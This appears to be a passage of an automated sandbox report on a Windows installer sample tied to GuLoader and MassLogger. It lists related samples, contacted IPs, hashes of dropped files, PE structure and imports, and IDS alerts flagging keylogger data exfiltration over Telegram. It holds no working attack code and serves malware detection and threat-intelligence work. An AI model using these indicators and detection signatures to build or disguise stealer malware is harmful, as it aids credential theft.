                                                                                        4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.217.18.97
                                                                                        • 142.250.181.238
                                                                                        ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.217.18.97
                                                                                        • 142.250.181.238
                                                                                        https://patiooutletmaipu.cl/tiendas/head/Get hashmaliciousLummaC, CAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                                                        • 172.217.18.97
                                                                                        • 142.250.181.238
                                                                                        IpykYx5iwz.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                        • 172.217.18.97
                                                                                        • 142.250.181.238
                                                                                        FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.217.18.97
                                                                                        • 142.250.181.238
                                                                                        ht58337iNC.exeGet hashmaliciousGuLoaderBrowse
                                                                                        • 172.217.18.97
                                                                                        • 142.250.181.238
                                                                                        ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        • 172.217.18.97
                                                                                        • 142.250.181.238
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            xXUnP7uCBJ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              4UQ5wnI389.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                    DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousUnknownBrowse
                                                                                                      KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                        Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                          Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                            Process:C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x2560, components 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):484658
                                                                                                            Entropy (8bit):7.809711763657168
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:W1S3xo63wl4biprI2S4WwWEcwxg9dvVAxZOCLF0DB:Wo3xX3y4bz2lWwWo6rSTZyd
                                                                                                            MD5:5C727AE28F0DECF497FBB092BAE01B4E
                                                                                                            SHA1:AADE364AE8C2C91C6F59F85711B53078FB0763B7
                                                                                                            SHA-256:77CCACF58330509839E17A6CFD6B17FE3DE31577D8E2C37DC413839BA2FEEC80
                                                                                                            SHA-512:5246C0FBA41DF66AF89D986A3CEABC99B61DB9E9C217B28B2EC18AF31E3ED17C865387223CEB3A38A804243CF3307E07E557549026F49F52829BEBC4D4546C40
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:......JFIF.....,.,.....]http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.566ebc5, 2022/05/09-07:22:29 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-04-27T15:00:27+08:00" xmp:ModifyDate="2022-09-22T14:01:54+08:00" xmp:MetadataDate="2022-09-22T14:01:54+08:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:b728d5c8-8822-6d4c-afc1-a393cb2a04ec"
                                                                                                            Process:C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):142743
                                                                                                            Entropy (8bit):4.60268621251581
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:hs8O5cvIV2iWFYknDWvRClhEa+DVRL4QF:hnvzHF1DiAEVfLb
                                                                                                            MD5:C085566A5550ECF615CF77E61B6A66FA
                                                                                                            SHA1:F6F56FE963EC12CB1508B0FE6F6A27AD3EB5661B
                                                                                                            SHA-256:6070C266CCF07F84931682B07EB44F0F9E7FD4CC8627D63FA7134CED8F95D156
                                                                                                            SHA-512:2FF81AFAFD17F6EC45B2F3900D6C70D0439989C2A253F0738C7CDF02CD9E82AF4E8AD4023074CFD72BBFB9C0DF5986C2BD63C8DE952E1911A620B5B2E0BA4221
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:..##....WW.55555...........x..................WW.'.....B...............................666.........888...........f.||............ff.ff.......!!...((..q....1.<...................................................sss.......BBBB......'.*........................................................dddddd...cc....................BBB.....e....................@....8.t.aaa...........!!!!................55.888888........}.....L.p......G.......AA............E.y...............}}}.j.......h................___.....II.................::.@...P.........................................tttt........@.......2.............<<<<<<<........(.....m...}}}}..................>>.......................a.HHH........................jj.............`.1..............JJJ.t.uu........qq..e............bb...RR.......2..C..............nn...8........^...................>>>.hh.........QQQ.........kkk.QQ..................~~...............{....................lllll....."..FF.==.............y.W...........|.Z.....P.#.....................
                                                                                                            Process:C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):112291
                                                                                                            Entropy (8bit):1.249420131631438
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:5R+BCpkJWjYWL2MxTVLvUjpGqik9JiAfWA2DBQwD1PzUH+HYZmIo7x31sT:WCZY21w0I2NZYD
                                                                                                            MD5:4D1D72CFC5940B09DFBD7B65916F532E
                                                                                                            SHA1:30A45798B534842002B103A36A3B907063F8A96C
                                                                                                            SHA-256:479F1904096978F1011DF05D52021FAEEE028D4CF331024C965CED8AF1C8D496
                                                                                                            SHA-512:048844A09E291903450188715BCDDF14F0F1F10BEAFBD005882EBF5D5E31A71D8F93EEBE788BD54B4AED2266C454F4DCA18AF4567977B7E773BBE29A38DEA45B
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:..........P............+......................................................................................................................X......n..(................G...................................m.........|.......................U.............`............l..............@}.........a........................................s............y.................N...............B...............w.e..........................................Q......*...................................................................................................a...........................f..................p..................t...........................................9.Q................@....................e................................................................:..............P.......S.........................P........................9..............._.......................(...............N............................................................H.T..........c..............................
                                                                                                            Process:C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):362089
                                                                                                            Entropy (8bit):1.23992084267325
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:xOeaameETrlE0+1mGOWb3h5WAV0hW+JSLSwzj2HlSdL0f6mhKZRaqOzWz6szt3cA:x+ds5dYOVxIW3hhdeRt6MeZ1W4vB
                                                                                                            MD5:A4340182CDDD2EC1F1480360218343F9
                                                                                                            SHA1:50EF929FEA713AA6FCC05E8B75F497B7946B285B
                                                                                                            SHA-256:B91E5B1FF5756F0B93DCF11CBC8B467CDA0C5792DE24D27EC86E7C74388B44B3
                                                                                                            SHA-512:021F198AFF7CCED92912C74FC97D1919A9E059F22E99AB1236FBAA36C16B520C07B78F47FC01FCFAC1B53A87CDAE3E440D0589FA2844612617FAB2EDB64A3573
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:..........F.............................i.....................B.........................................b..Et.............................O...........h...............................................................................8..........n.....................w.................../.......|.......'........,..........(...........................W......#..................................................................................................=..........................]..........q................................................[.................2....S............................"...................................$!..............................=.......................................[f.................................................................................................................V.............................w...................................................$.............................................................j...........h.............J..............
                                                                                                            Process:C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):284986
                                                                                                            Entropy (8bit):7.795442726158851
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:leI2gIPbvgTiiaOhIW3D1/8d7evTfW5BfuRLZ3DI4kMAoeyBRx:zxIDgTYgIUl8d7s7MyL5dAoDn
                                                                                                            MD5:D3C766A5AA9FAB3E7F9E530676219359
                                                                                                            SHA1:E554311EF05FFF6AD6C04E2BE83EA958EBBCDF50
                                                                                                            SHA-256:42C2D36EEA6FAB6B4703F9403DA0E8B4807B4C6E8D99C3CC685A4DD52166AD8E
                                                                                                            SHA-512:4657655963D458452251F0BE67682CCEC1D9639290F1DB9593C870689A1A512C72188FC71ACB741B365386C8B785B86614DEFDECE4F64F3A1F2D69714ED916BD
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:.....5555..............v..........>>>............f......@...................rr....6...PPPP......B............QQQ...../.................................DDDDD.............YYY.....>>>....................'.........>............E.PPPP......................TT...........MMM....................5..5.........{........xx......................w......8...X.......G.............................>...............................................v........[[.........r...EEE......333......o....:...................ssss..........<..........|||||.......................................e...........WW.........B......^.......XX.....&&.......8.............`.fff...................**........................OO...PP.p...............II....!!!!...oo..................... ..7.......................JJJ....................................''''..........hh.|..UUUUU..V...........g................D.uu.....I....OOOO.....iii..................!...zz...3333...@@@@@..MM...D.C..........%%......]]]]]]..O.R..q...............N.$....wwwww
                                                                                                            Process:C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            File Type:FoxPro FPT, blocks size 22, next free block index 285212672, field type 0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):139354
                                                                                                            Entropy (8bit):1.2473328695625903
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:9OsMSh8lSnJGyUzWZsO2ipzPFmDZC9kpzroto48tf2+5lVp:9delFlqNawgJp
                                                                                                            MD5:B0FB6B583D6902DE58E1202D12BA4832
                                                                                                            SHA1:7F585B5C3A4581CE76E373C78A6513F157B20480
                                                                                                            SHA-256:E6EA5F6D0C7F5FA407269C7F4FF6D97149B7611071BF5BF6C454B810501AE661
                                                                                                            SHA-512:E0894FFBD76C3476DC083DAFD24F88964BF6E09E4CA955766B43FE73A764A00247C930E9996652A22B57B27826CD94F88B8178514060CA398DE568675F9E4571
                                                                                                            Malicious:false
                                                                                                            Preview:.......................................|...................................................................+................$......&....A........................................................Z.....................................A...............!.....Y........................l..........9..................c.............f.................F...".................................................h.......................................\..............J............................5......t.....E.................q........................:......^....................................................................................I..........................................................x......W....................................................................................M...........................X..............................,..................m.......................................................................................................................J........ ...F...........
                                                                                                            Process:C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):12288
                                                                                                            Entropy (8bit):5.719859767584478
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                            MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                            SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                            SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                            SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: 6mGpn6kupm.exe, Detection: malicious, Browse
                                                                                                            • Filename: v4nrZtP7K2.exe, Detection: malicious, Browse
                                                                                                            • Filename: xXUnP7uCBJ.exe, Detection: malicious, Browse
                                                                                                            • Filename: 4UQ5wnI389.exe, Detection: malicious, Browse
                                                                                                            • Filename: ajRZflJ2ch.exe, Detection: malicious, Browse
                                                                                                            • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                            • Filename: DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Detection: malicious, Browse
                                                                                                            • Filename: KO0q4biYfC.exe, Detection: malicious, Browse
                                                                                                            • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                                                                                            • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Users\user\Desktop\2CQ2zMn0hb.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1552308
                                                                                                            Entropy (8bit):5.454840358491344
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:ASDgIUt7MyLfDAo3xX3y4bz2lWwWo6rSTZyqI:A8aFMIAoBXbz2luo6rS1yh
                                                                                                            MD5:11F46E3ED02F0A34FD135D31ACD8073A
                                                                                                            SHA1:B6BA86818AA25B4447ED4ADEB723B47EB2632713
                                                                                                            SHA-256:2540431A79510D55BFE626D2EA6913C0C8A4ECBBC1BF2A0B78839BFA7619D063
                                                                                                            SHA-512:6A6A51F0EB0B910D3A6975FB07602BDD0B81C2FD18F758A9C53320BFF99BBF4058FCC8D2D95A72883242B3682C7B2DE17994BC9C0C8492E364F70F659AE2786F
                                                                                                            Malicious:false
                                                                                                            Preview:$6......,.......,.......\........!.......4.......5..........................M...i............................H..............................................................................................................................................................................G...J...............h...............................................................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                            Entropy (8bit):7.961456422421853
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                            File name:2CQ2zMn0hb.exe
                                                                                                            File size:1'052'225 bytes
                                                                                                            MD5:57a8326258e722638fdfab7715e94356
                                                                                                            SHA1:ae16c7ecb431ad5775bd0b00c39117756431422b
                                                                                                            SHA256:df4f955eb7e72870bf18d39f3dfe1fad5fb9093a080e65f315d215bfec94cc2f
                                                                                                            SHA512:9fbf9f21a79a7b02aeb4a51c54394a67ed9d394b0895c4c6f3c9022e6631c1f66f63e2df0eefcbd64164e9b949a001746bf14c2648dfd2f691e673d62cf2b8a3
                                                                                                            SSDEEP:24576:9jwKCNucluh8HfWRd7aEIRYO0sCaHfToikFhZD1fJAj1:V1CVqyfi7a2O0RniAZD/a1
                                                                                                            TLSH:29253309B263EE2BE9945E74AE0AC4FAF8DB8D031C44B48727B0365E7A72275C51F354
                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...$..\.................f...*.....
                                                                                                            Icon Hash:46224e4c19391d03
                                                                                                            Entrypoint:0x4034a5
                                                                                                            Entrypoint Section:.text
                                                                                                            Digitally signed:false
                                                                                                            Imagebase:0x400000
                                                                                                            Subsystem:windows gui
                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                            Time Stamp:0x5C157F24 [Sat Dec 15 22:24:36 2018 UTC]
                                                                                                            TLS Callbacks:
                                                                                                            CLR (.Net) Version:
                                                                                                            OS Version Major:4
                                                                                                            OS Version Minor:0
                                                                                                            File Version Major:4
                                                                                                            File Version Minor:0
                                                                                                            Subsystem Version Major:4
                                                                                                            Subsystem Version Minor:0
                                                                                                            Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                            Instruction
                                                                                                            sub esp, 000002D4h
                                                                                                            push ebx
                                                                                                            push esi
                                                                                                            push edi
                                                                                                            push 00000020h
                                                                                                            pop edi
                                                                                                            xor ebx, ebx
                                                                                                            push 00008001h
                                                                                                            mov dword ptr [esp+14h], ebx
                                                                                                            mov dword ptr [esp+10h], 0040A230h
                                                                                                            mov dword ptr [esp+1Ch], ebx
                                                                                                            call dword ptr [004080ACh]
                                                                                                            call dword ptr [004080A8h]
                                                                                                            and eax, BFFFFFFFh
                                                                                                            cmp ax, 00000006h
                                                                                                            mov dword ptr [0042A24Ch], eax
                                                                                                            je 00007F8418EC6C73h
                                                                                                            push ebx
                                                                                                            call 00007F8418EC9F3Dh
                                                                                                            cmp eax, ebx
                                                                                                            je 00007F8418EC6C69h
                                                                                                            push 00000C00h
                                                                                                            call eax
                                                                                                            mov esi, 004082B0h
                                                                                                            push esi
                                                                                                            call 00007F8418EC9EB7h
                                                                                                            push esi
                                                                                                            call dword ptr [00408150h]
                                                                                                            lea esi, dword ptr [esi+eax+01h]
                                                                                                            cmp byte ptr [esi], 00000000h
                                                                                                            jne 00007F8418EC6C4Ch
                                                                                                            push 0000000Ah
                                                                                                            call 00007F8418EC9F10h
                                                                                                            push 00000008h
                                                                                                            call 00007F8418EC9F09h
                                                                                                            push 00000006h
                                                                                                            mov dword ptr [0042A244h], eax
                                                                                                            call 00007F8418EC9EFDh
                                                                                                            cmp eax, ebx
                                                                                                            je 00007F8418EC6C71h
                                                                                                            push 0000001Eh
                                                                                                            call eax
                                                                                                            test eax, eax
                                                                                                            je 00007F8418EC6C69h
                                                                                                            or byte ptr [0042A24Fh], 00000040h
                                                                                                            push ebp
                                                                                                            call dword ptr [00408044h]
                                                                                                            push ebx
                                                                                                            call dword ptr [004082A0h]
                                                                                                            mov dword ptr [0042A318h], eax
                                                                                                            push ebx
                                                                                                            lea eax, dword ptr [esp+34h]
                                                                                                            push 000002B4h
                                                                                                            push eax
                                                                                                            push ebx
                                                                                                            push 004216E8h
                                                                                                            call dword ptr [00408188h]
                                                                                                            push 0040A384h
                                                                                                            Programming Language:
                                                                                                            • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                            .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                            .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                            .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                            RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                            RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                            RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                            RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                            RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                            RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                            RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                            RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                            RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                            RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                            RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                            RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                            RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                            RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                            RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                            RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                            RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                            RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                            RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                            RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                            RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                            RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                            DLLImport
                                                                                                            KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                            USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                            SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                            ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                            EnglishUnited States
                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2025-01-10T21:53:22.884979+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549827142.250.181.238443TCP
                                                                                                            2025-01-10T21:53:28.377864+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549861132.226.247.7380TCP
                                                                                                            2025-01-10T21:53:35.049704+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549861132.226.247.7380TCP
                                                                                                            2025-01-10T21:53:35.731626+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549912149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:35.981783+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549912149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:36.877827+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549919132.226.247.7380TCP
                                                                                                            2025-01-10T21:53:37.461511+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549924149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:37.974563+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549924149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:39.482257+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549939149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:39.734489+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549939149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:41.069098+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549952149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:41.380977+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549952149.154.167.220443TCP
                                                                                                            2025-01-10T21:53:42.706837+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549966149.154.167.220443TCP
